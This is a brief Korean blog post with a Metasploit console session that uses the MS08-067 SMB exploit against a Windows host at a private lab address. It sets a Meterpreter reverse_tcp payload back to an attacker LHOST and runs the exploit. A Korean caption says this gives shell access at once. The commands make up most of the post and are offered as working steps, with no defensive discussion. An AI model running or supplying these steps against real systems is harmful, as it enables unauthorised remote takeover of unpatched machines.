![1.jpg](https://suritam9.pe.kr/files/attach/images/826/644/001/03af8137bee2cd0e9aaf031dbcc37778.jpg)
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 10.211.55.140 RHOST => 10.211.55.140 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.211.55.162
msf exploit(ms08_067_netapi) > exploit
위와 같이 하면, 바로 쉘에 접근되고, 관련 동영상은 아래 주소에 있다.
![275.jpg](https://suritam9.pe.kr/files/attach/images/139/095/003/7b2bde50f78f67cebe75fb230ff977ce.jpg)
댓글 달기